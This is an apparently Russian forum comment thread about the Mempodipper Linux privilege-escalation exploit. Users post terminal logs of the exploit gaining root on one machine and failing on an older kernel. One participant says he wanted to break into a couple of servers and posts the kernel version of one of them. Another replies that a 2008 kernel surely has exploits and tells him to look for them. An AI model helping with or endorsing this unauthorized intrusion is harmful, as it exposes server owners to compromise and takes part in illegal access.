• рабочие эксплойт есть?
  • @zamotivator,
    xl0@bzz:~$ ./a.out
    ===============================
    = Mempodipper =
    = by zx2c4 =
    = Jan 21, 2012 =
    ===============================

    [+] Waiting for transferred fd in parent.
    [+] Executing child from child fork.
    [+] Opening parent mem /proc/12721/mem in child.
    [+] Sending fd 3 to parent.
    [+] Received fd at 5.
    [+] Assigning fd 5 to stderr.
    [+] Reading su for exit@plt.
    [+] Resolved exit@plt to 0x401fa8.
    [+] Calculating su padding.
    [+] Seeking to offset 0x401f9c.
    [+] Executing su with shellcode.
    # whoami
    root
    #
  • @xl0, вот сука. Дай сорцы, проверяю у себя
  • @zamotivator, Первая ссылка в посте zx2c4.
  • @xl0, не работает

    oleg.tsarev (0) ~$ sudo chown root:root ./a.out
    oleg.tsarev (0) ~$ ./a.out
    ===============================
    = Mempodipper =
    = by zx2c4 =
    = Jan 21, 2012 =
    ===============================

    [+] Waiting for transferred fd in parent.
    [+] Executing child from child fork.
    [+] Opening parent mem /proc/19045/mem in child.
    [+] Sending fd 3 to parent.
    [+] Received fd at 5.
    [+] Assigning fd 5 to stderr.
    [+] Reading su for exit@plt.
    [+] Resolved exit@plt to 0x1e88.
    [+] Calculating su padding.
    [+] Seeking to offset 0x1e7f.
    [+] Executing su with shellcode.
    oleg.tsarev (0) ~$ whoami
    oleg.tsarev
    oleg.tsarev (0) ~$ ls -al | grep a.out
    -rwxrwxr-x. 1 root root 12803 Jan 23 20:49 a.out
    oleg.tsarev (0) ~$
  • @zamotivator, Ядро обнови. ;)
  • @xl0, Чо, слишком старое?

    oleg.tsarev (0) ~$ cat /etc/issue
    RFRemix release 14.1 (Laughlin)
    Kernel \r on an \m (\l)

    oleg.tsarev (0) ~$ uname -a
    Linux tsarev.t510 2.6.35.14-106.fc14.x86_64 #1 SMP Wed Nov 23 13:07:52 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
    oleg.tsarev (0) ~$
  • @zamotivator, Надо 39 ж.
  • @xl0, тогда неинтересно. Я как раз хотел трахнуть пару серваков, и облом
  • @zamotivator, Всё бы тебе трахнуть, вот кабель!
  • @xl0, ну и нахуй так жить, ничего не поимеешь даже

    [oleg.tsarev@*** ~]$ uname -a
    Linux *** 2.6.18-92.1.22.el5.centos.plus #1 SMP Wed Dec 17 10:49:19 EST 2008 x86_64 x86_64 x86_64 GNU/Linux
  • @zamotivator, Ты полуркай, если оно собрано в 2008, стопудово будут к нему ксплойты.